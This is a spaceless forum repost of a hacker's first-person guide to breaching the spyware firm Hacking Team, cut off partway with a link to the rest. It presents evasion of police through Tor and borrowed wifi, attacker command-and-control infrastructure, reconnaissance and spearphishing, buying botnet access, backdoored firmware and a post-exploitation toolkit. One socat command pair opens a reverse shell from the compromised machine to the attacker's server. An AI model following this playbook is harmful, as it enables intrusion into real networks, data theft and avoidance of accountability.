5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"

FreeEBooks TechnologyToday LeadingSites TheMobileBlog

Welcome,jasemc
0Notifications 5posts LastLogin:2ndMay2016 ControlPanel LogOut

MANAGEMENT HARDWARE SOFTWARE MULTIMEDIA COMPUTER NETWORK ADULT LOUNGE

ForumRules FAQ NewPosts ForumActions AccountActions QuickLinks AdvancedSearch

Forum ComputerZone WorldWideWeb Howtohack,TipsandTutorialsfromREAL"Hacker"

Results1to1of1
+ReplytoThread
Thread:Howtohack,TipsandTutorialsfromREAL"Hacker"
Like SignUptoseewhatyourfriendslike.

ThreadTools SearchThread

2ndMay2016,12:46 #1

cybersniper
Howtohack,TipsandTutorialsfromREAL&quotHacker&quot
RadiantHeirofApollo
SharekolangmgakSBsmgaGustomatutungHACKINGmaramikyongmkukuhangTipsandTutorialsdtokungPanumaging
successfulwhilehackingandnottogetcaught:)

ForthoseofyouwhowanttoknowhowhehackedtheHACKINGTEAM(thecontroversialgovernmentspyingandhackingtoolseller)
heresthestoryGOHERE!

AndforthoseofyouwhowantknowtheSTEPBYSTEPTips,TechniquesandTutorials.:)

JoinDate: Jan2014 [1Introduction]

Network: Globe
You'llnoticethechangeinlanguagesincethelastedition[1].The
Thanked27Timesin11Posts Englishspeakingworldalreadyhastonsofbooks,talks,guides,and
infoabouthacking.Inthatworld,there'splentyofhackersbetterthanme,
buttheymisusetheirtalentsworkingfor"defense"contractors,forintelligence
agencies,toprotectbanksandcorporations,andtodefendthestatusquo.
HackerculturewasbornintheUSasacounterculture,butthatoriginonly
remainsinitsaestheticstheresthasbeenassimilated.Atleasttheycan
wearatshirt,dyetheirhairblue,usetheirhackernames,andfeellike
rebelswhiletheyworkfortheMan.

Youusedtohavetosneakintoofficestoleakdocuments[2].Youusedtoneed
aguntorobabank.Nowyoucandobothfrombedwithalaptopinhand[3][4].
LiketheCNTsaidaftertheGammaGrouphack:"Let'stakeastepforwardwith
newformsofstruggle"[5].Hackingisapowerfultool,let'slearnandfight!

[1]http://pastebin.com/raw.php?i=cRYvK4jb
[2]https://en.wikipedia.org/wiki/Citize...tigate_the_FBI
[3]http://www.aljazeera.com/news/2015/0...083914167.html
[4]https://securelist.com/files/2015/02...ak_APT_eng.pdf
[5]http://madrid.cnt.es/noticia/conside...agammagroup

[2HackingTeam]

HackingTeamwasacompanythathelpedgovernmentshackandspyon
journalists,activists,politicalopposition,andotherthreatstotheirpower
[1][2][3][4][5][6][7][8][9][10][11].And,occasionally,onactualcriminals
andterrorists[12].Vincenzetti,theCEO,likedtoendhisemailswiththe
fascistslogan"boiachimolla".It'dbemorecorrecttosay"boiachivende
RCS".Theyalsoclaimedtohavetechnologytosolvethe"problem"posedbyTor
andthedarknet[13].ButseeingasI'mstillfree,Ihavemydoubtsabout
itseffectiveness.

[1]http://www.animalpolitico.com/2015/0...najepolitico/
[2]http://www.prensa.com/politica/clave...251324994.html
[3]http://www.24horas.mx/ecuadorespio...rlosfigueroa/
[4]https://citizenlab.org/2012/10/backd...ngofdissent/
[5]https://citizenlab.org/2014/02/hacki...njournalists/
[6]https://citizenlab.org/2015/03/hacki...getedspyware/
[7]http://focusecuador.net/2015/07/08/h...osenecuador/
[8]http://www.pri.org/stories/2015070...sarepersonal
[9]https://theintercept.com/2015/07/07/...ivecountries/
[10]http://www.wired.com/2013/06/spytoo...ogovernments/
[11]http://www.theregister.co.uk/2015/07...m_vietnam_apt/
[12]http://www.ilmessaggero.it/primopian...m1588888.html
[13]http://motherboard.vice.com/en_ca/re...kthedarkweb

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 1/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
[3Staysafeoutthere]

Unfortunately,ourworldisbackwards.Yougetrichbydoingbadthingsandgo
tojailfordoinggood.Fortunately,thankstothehardworkofpeoplelike
theTorproject[1],youcanavoidgoingtojailbytakingafewsimple
precautions:

1)Encryptyourharddisk[2]

Iguesswhenthepolicearrivetoseizeyourcomputer,itmeansyou've
alreadymadealotofmistakes,butit'sbettertobesafe.

2)UseavirtualmachinewithalltrafficroutedthroughTor

Thisaccomplishestwothings.First,allyourtrafficisanonymizedthrough
Tor.Second,keepingyourpersonallifeandyourhackingonseparate
computershelpsyounottomixthembyaccident.

YoucanuseprojectslikeWhonix[3],Tails[4],QubesTorVM[5],or
somethingcustom[6].Here's[7]adetailedcomparison.

3)(Optional)Don'tconnectdirectlytoTor

Torisn'tapanacea.Theycancorrelatethetimesyou'reconnectedtoTor
withthetimesyourhackerhandleisactive.Also,therehavebeen
successfulattacksagainstTor[8].YoucanconnecttoTorusingother
peoples'wifi.Wifislax[9]isalinuxdistrowithalotoftoolsfor
crackingwifi.AnotheroptionistoconnecttoaVPNorabridgenode[10]
beforeTor,butthat'slesssecurebecausetheycanstillcorrelatethe
hacker'sactivitywithyourhouse'sinternetactivity(thiswasusedas
evidenceagainstJeremyHammond[11]).

TherealityisthatwhileTorisn'tperfect,itworksquitewell.WhenI
wasyoungandreckless,Ididplentyofstuffwithoutanyprotection(I'm
referringtohacking)apartfromTor,thatthepolicetriedtheirhardest
toinvestigate,andI'veneverhadanyproblems.

[1]https://www.torproject.org/
[2]https://info.securityinabox.org/es/chapter4
[3]https://www.whonix.org/
[4]https://tails.boum.org/
[5]https://www.qubesos.org/doc/privacy/torvm/
[6]https://trac.torproject.org/projects...ansparentProxy
[7]https://www.whonix.org/wiki/Comparison_with_Others
[8]https://blog.torproject.org/blog/tor...mationattack/
[9]http://www.wifislax.com/
[10]https://www.torproject.org/docs/bridges.html.en
[11]http://www.documentcloud.org/documen...anarchaos.html

[3.1Infrastructure]

Idon'thackdirectlyfromTorexitnodes.They'reonblacklists,they're
slow,andtheycan'treceiveconnectbacks.TorprotectsmyanonymitywhileI
connecttotheinfrastructureIusetohack,whichconsistsof:

1)DomainNames

ForC&Caddresses,andforDNStunnelsforguaranteedegress.

2)StableServers

ForuseasC&Cservers,toreceiveconnectbackshells,tolaunchattacks,
andtostoretheloot.

3)HackedServers

ForuseaspivotstohidetheIPaddressesofthestableservers.Andfor
whenIwantafastconnectionwithoutpivoting,forexampletoscanports,
scanthewholeinternet,downloadadatabasewithsqli,etc.

Obviously,youhavetouseananonymouspaymentmethod,likebitcoin(ifit's
usedcarefully).

[3.2Attribution]

Inthenewsweoftenseeattackstracedbacktogovernmentbackedhacking
groups("APTs"),becausetheyrepeatedlyusethesametools,leavethesame
footprints,andevenusethesameinfrastructure(domains,emails,etc).
They'renegligentbecausetheycanhackwithoutlegalconsequences.

Ididn'twanttomakethepolice'sworkanyeasierbyrelatingmyhackof
HackingTeamwithotherhacksI'vedoneorwithnamesIuseinmydaytoday
workasablackhathacker.So,Iusednewserversanddomainnames,registered
withnewemails,andpayedforwithnewbitcoinaddresses.Also,Ionlyused
toolsthatarepubliclyavailable,orthingsthatIwrotespecificallyfor
thisattack,andIchangedmywayofdoingsomethingstonotleavemyusual
forensicfootprint.

[4InformationGathering]

Althoughitcanbetedious,thisstageisveryimportant,sincethelargerthe
attacksurface,theeasieritistofindaholesomewhereinit.

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 2/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"
[4.1TechnicalInformation]

Sometoolsandtechniquesare:

1)Google

Alotofinterestingthingscanbefoundwithafewwellchosensearch
queries.Forexample,theidentityofDPR[1].ThebibleofGooglehacking
isthebook"GoogleHackingforPenetrationTesters".Youcanfindashort
summaryinSpanishat[2].

2)SubdomainEnumeration

Often,acompany'smainwebsiteishostedbyathirdparty,andyou'llfind
thecompany'sactualIPrangethankstosubdomainslikemx.company.comor
ns1.company.com.Also,sometimestherearethingsthatshouldn'tbeexposed
in"hidden"subdomains.Usefultoolsfordiscoveringdomainsandsubdomains
arefierce[3],theHarvester[4],andreconng[5].

3)Whoislookupsandreverselookups

WithareverselookupusingthewhoisinformationfromadomainorIPrange
ofacompany,youcanfindotherdomainsandIPranges.AsfarasIknow,
there'snofreewaytodoreverselookupsasidefromagoogle"hack":

"viadellamoscova13"site:www.findipaddress.com
"viadellamoscova13"site:domaintools.com

4)Portscanningandfingerprinting

Unliketheothertechniques,thistalkstothecompany'sservers.I
includeitinthissectionbecauseit'snotanattack,it'sjust
informationgathering.Thecompany'sIDSmightgenerateanalert,butyou
don'thavetoworrysincethewholeinternetisbeingscannedconstantly.

Forscanning,nmap[6]isprecise,andcanfingerprintthemajorityof
servicesdiscovered.ForcompanieswithverylargeIPranges,zmap[7]or
masscan[8]arefast.WhatWeb[9]orBlindElephant[10]canfingerprintweb
sites.

[1]http://www.nytimes.com/2015/12/27/bu...silkroad.html
[2]http://web.archive.org/web/201406100...con_google.pdf
[3]http://ha.ckers.org/fierce/
[4]https://github.com/laramies/theHarvester
[5]https://bitbucket.org/LaNMaSteR53/reconng
[6]https://nmap.org/
[7]https://zmap.io/
[8]https://github.com/robertdavidgraham/masscan
[9]http://www.morningstarsecurity.com/research/whatweb
[10]http://blindelephant.sourceforge.net/

[4.2SocialInformation]

Forsocialengineering,it'susefultohaveinformationabouttheemployees,
theirroles,contactinformation,operatingsystem,browser,plugins,
software,etc.Someresourcesare:

1)Google

Hereaswell,it'sthemostusefultool.

2)theHarvesterandreconng

Ialreadymentionedthemintheprevioussection,buttheyhavealotmore
functionality.Theycanfindalotofinformationquicklyand
automatically.It'sworthreadingalltheirdocumentation.

3)LinkedIn

Alotofinformationabouttheemployeescanbefoundhere.Thecompany's
recruitersarethemostlikelytoacceptyourconnectionrequests.

4)Data.com

Previouslyknownasjigsaw.Theyhavecontactinformationformany
employees.

5)FileMetadata

Alotofinformationaboutemployeesandtheirsystemscanbefoundin
metadataoffilesthecompanyhaspublished.Usefultoolsforfinding
filesonthecompany'swebsiteandextractingthemetadataaremetagoofil
[1]andFOCA[2].

[1]https://github.com/laramies/metagoofil
[2]https://www.elevenpaths.com/es/labst...a2/index.html

[5Enteringthenetwork]

Therearevariouswaystogetafoothold.SincethemethodIusedagainst
HackingTeamisuncommonandalotmoreworkthanisusuallynecessary,I'll
talkalittleaboutthetwomostcommonways,whichIrecommendtryingfirst.

[5.1SocialEngineering]

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 3/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"

Socialengineering,specificallyspearphishing,isresponsibleforthe
majorityofhacksthesedays.ForanintroductioninSpanish,see[1].For
moreinformationinEnglish,see[2](thethirdpart,"TargetedAttacks").For
funstoriesaboutthesocialengineeringexploitsofpastgenerations,see
[3].Ididn'twanttotrytospearphishHackingTeam,astheirwholebusiness
ishelpinggovernmentsspearphishtheiropponents,sothey'dbemuchmore
likelytorecognizeandinvestigateaspearphishingattempt.

[1]http://www.hacknbytes.com/2016/01/ap...onempire.html
[2]http://blog.cobaltstrike.com/2015/09...rseandnotes/
[3]http://www.netcomunity.com/lesterthe...ingsocial1.pdf

[5.2BuyingAccess]

ThankstohardworkingRussiansandtheirexploitkits,trafficsellers,and
botherders,manycompaniesalreadyhavecompromisedcomputersintheir
networks.AlmostalloftheFortune500,withtheirhugenetworks,havesome
botsalreadyinside.However,HackingTeamisaverysmallcompany,andmost
ofit'semployeesareinfosecexperts,sotherewasalowchancethatthey'd
alreadybeencompromised.

[5.3TechnicalExploitation]

AftertheGammaGrouphack,Idescribedaprocessforsearchingfor
vulnerabilities[1].HackingTeamhadonepublicIPrange:
inetnum:93.62.139.3293.62.139.47
descr:HTpublicsubnet

HackingTeamhadverylittleexposedtotheinternet.Forexample,unlike
GammaGroup,theircustomersupportsiteneededaclientcertificateto
connect.Whattheyhadwastheirmainwebsite(aJoomlabloginwhichJoomscan
[2]didn'tfindanythingserious),amailserver,acouplerouters,twoVPN
appliances,andaspamfilteringappliance.So,Ihadthreeoptions:lookfor
a0dayinJoomla,lookfora0dayinpostfix,orlookfora0dayinoneofthe
embeddeddevices.A0dayinanembeddeddeviceseemedliketheeasiestoption,
andaftertwoweeksofworkreverseengineering,Igotaremoterootexploit.
Sincethevulnerabilitiesstillhaven'tbeenpatched,Iwon'tgivemore
details,butformoreinformationonfindingthesekindsofvulnerabilities,
see[3]and[4].

[1]http://pastebin.com/raw.php?i=cRYvK4jb
[2]http://sourceforge.net/projects/joomscan/
[3]http://www.devttys0.com/
[4]https://docs.google.com/presentation...mDA2z9zzHpon8A

[6BePrepared]

IdidalotofworkandtestingbeforeusingtheexploitagainstHackingTeam.
Iwroteabackdooredfirmware,andcompiledvariouspostexploitationtools
fortheembeddeddevice.Thebackdoorservestoprotecttheexploit.Usingthe
exploitjustonceandthenreturningthroughthebackdoormakesitharderto
identifyandpatchthevulnerabilities.

ThepostexploitationtoolsthatI'dpreparedwere:

1)busybox

ForallthestandardUnixutilitiesthatthesystemdidn'thave.

2)nmap

ToscanandfingerprintHackingTeam'sinternalnetwork.

3)Responder.py

Themostusefultoolforattackingwindowsnetworkswhenyouhaveaccessto
theinternalnetwork,butnodomainuser.

4)Python

ToexecuteResponder.py

5)tcpdump

Forsniffingtraffic.

6)dsniff

Forsniffingpasswordsfromplaintextprotocolslikeftp,andfor
arpspoofing.Iwantedtouseettercap,writtenbyHackingTeam'sownALoR
andNaGA,butitwashardtocompileitforthesystem.

7)socat

Foracomfortableshellwithapty:
my_server:socatfile:`tty`,raw,echo=0tcplisten:my_port
hackedbox:socatexec:'bashli',pty,stderr,setsid,sigint,sane\
tcp:my_server:my_port

Andusefulforalotmore,it'sanetworkingswissarmyknife.Seethe
examplessectionofitsdocumentation.

8)screen

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 4/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"

Liketheshellwithpty,itwasn'treallynecessary,butIwantedtofeel
athomeinHackingTeam'snetwork.

9)aSOCKSproxyserver

Tousewithproxychainstobeabletoaccesstheirlocalnetworkfromany
program.

10)tgcd

Forforwardingports,likefortheSOCKSserver,throughthefirewall.

[1]https://www.busybox.net/
[2]https://nmap.org/
[3]https://github.com/SpiderLabs/Responder
[4]https://github.com/bendmorris/staticpython
[5]http://www.tcpdump.org/
[6]http://www.monkey.org/~dugsong/dsniff/
[7]http://www.destunreach.org/socat/
[8]https://www.gnu.org/software/screen/
[9]http://averagecoder.blogspot.com/20...rverinc.html
[10]http://tgcd.sourceforge.net/

Theworstthingthatcouldhappenwouldbeformybackdoororpostexploitation
toolstomakethesystemunstableandcauseanemployeetoinvestigate.SoI
spentaweektestingmyexploit,backdoor,andpostexploitationtoolsinthe
networksofothervulnerablecompaniesbeforeenteringHackingTeam'snetwork.

[7WatchandListen]

Nowinsidetheirinternalnetwork,Iwantedtotakealookaroundandthink
aboutmynextstep.IstartedResponder.pyinanalysismode(Atolisten
withoutsendingpoisonedresponses),anddidaslowscanwithnmap.

[8NoSQLDatabases]

NoSQL,orratherNoAuthentication,hasbeenahugegifttothehacker
community[1].JustwhenIwasworriedthatthey'dfinallypatchedallofthe
authenticationbypassbugsinMySQL[2][3][4][5],newdatabasescameinto
stylethatlackauthenticationbydesign.NmapfoundafewinHackingTeam's
internalnetwork:

27017/tcpopenmongodbMongoDB2.6.5
|mongodbdatabases:
|ok=1
|totalSizeMb=47547
|totalSize=49856643072
...
|_version=2.6.5

27017/tcpopenmongodbMongoDB2.6.5
|mongodbdatabases:
|ok=1
|totalSizeMb=31987
|totalSize=33540800512
|databases
...
|_version=2.6.5

TheywerethedatabasesfortestinstancesofRCS.TheaudiothatRCSrecords
isstoredinMongoDBwithGridFS.Theaudiofolderinthetorrent[6]came
fromthis.Theywerespyingonthemselveswithoutmeaningto.

[1]https://www.shodan.io/search?query=product%3Amongodb
[2]https://community.rapid7.com/communi...flawinmysql
[3]http://archives.neohapsis.com/archiv...4q3/0001.html
[4]http://downloads.securityfocus.com/v...hoagie_mysql.c
[5]http://archives.neohapsis.com/archiv...002/0053.html
[6]https://ht.transparencytoolkit.org/audio/

CONTINUATION...............HINDINKASYAEHTOOLONGCHARACTERNRAW,HEHE:)

FORCOMPLETETUTORIALVISIT

http://pinoyprogrammer.co/vigilante...teamexplains/

Updated

I hope you find it very useful Enjoy Learning : )

Lasteditedbycybersniper2ndMay2016at16:58.

"IWouldn'tSayImaHacker"
"IWouldSay!IAMaResercher"
"AndipostallmyResearchinonePlaceANDSHAREITTOOTHERS"
http://pinoyprogrammer.co/:)
VisitmysitetofindoutmoreandaccessallmyRESEARCHin"
"SECURITY,HACKING,PROGRAMMING,WEBDEVELOPMENT
ANDINTERNETTIPSANDTRICKS"

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 5/6
5/4/2016 Howtohack,TipsandTutorialsfromREAL"Hacker"

AddToQuote ReplyWithQuote Thanks ReportPost

1UserSaysThankYoutocybersniperForThisUsefulPost.

SponsoredPost

+ReplytoThread

FacebookAccountHackVideoTutorial|Needhelpcan'tresearch@google

SimilarThreads
howtohackN73andNokia6600? Replies:5
ByhwatkinsinforumSymbianS60Apps LastPost:17thMar2011,00:40

helphowtohackE52andC5 Replies:6
ByshanedyinforumSymbianS603rdEd.Apps LastPost:15thFeb2011,08:00

Howtohackunhackablesite[tutorial] Replies:0
Bydens29_trekinforumPCHardwareChat LastPost:17thDec2010,16:13

Howtohackn72?Andwhatisdifferenttohackandnotphone? Replies:3
Byiane28inforumNokia LastPost:27thApr2010,14:48

HowtoFightDepressionandAnxietyfromWebMD Replies:0
ByrobinsonliminforumHealthandFitness LastPost:3rdJan2008,19:43

TagsforthisThread
None
ViewTagCloud Add/EditTags

PostingPermissions
Youmaypostnewthreads BBcodeisOn
Youmaypostreplies SmiliesareOn
Youmaypostattachments [IMG]codeisOff
Youmayedityourposts [VIDEO]codeisOn
HTMLcodeisOff
ForumRules

AlltimesareGMT+8.Thetimenowis12:57.

Symbianize.com20062016 ContactUs Symbianize Sitemap PrivacyPolicy Top

http://www.symbianize.com/showthread.php?t=1349631&highlight=open+vpn 6/6